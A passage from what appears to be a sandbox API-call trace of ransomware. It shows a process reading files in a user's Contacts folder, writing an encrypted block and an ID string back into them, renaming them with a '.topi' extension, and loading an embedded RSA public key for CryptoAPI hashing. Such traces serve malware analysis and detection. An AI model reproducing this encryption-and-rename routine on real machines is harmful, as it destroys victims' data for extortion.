lpDistanceToMoveHigh=0x0) returned 0x5 [0093.322] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf78 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175990 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf60 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0093.322] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0093.322] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x31bab28 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d89a0 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0093.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.324] GetCurrentThreadId () returned 0x8c4 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e0f20 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.324] GetCurrentThreadId () returned 0x8c4 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.324] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.324] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8dc0 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e08 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8df0 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8dc0 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0093.325] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0093.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf90 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bab28 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0093.326] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bc228 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31baf60 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0093.327] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0093.327] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x10b19, lpOverlapped=0x0) returned 1 [0093.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0093.328] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0093.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0093.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0093.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0093.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0093.328] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0093.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0093.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0093.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0093.328] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0093.328] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0093.328] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0093.328] CloseHandle (hObject=0x6a8) returned 1 [0093.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0093.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0093.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0093.335] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.topi")) returned 1 [0093.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.335] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0093.337] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0093.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0093.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0093.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0093.337] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0093.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0093.337] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1171) returned 1 [0093.337] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0093.340] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.340] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0093.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.342] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.342] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x493, lpOverlapped=0x0) returned 1 [0093.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x3193e68 [0093.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.343] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0093.343] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0093.344] CryptHashData (hHash=0x31c7580, pbData=0x3193e68, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0093.344] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0093.344] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0093.344] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] 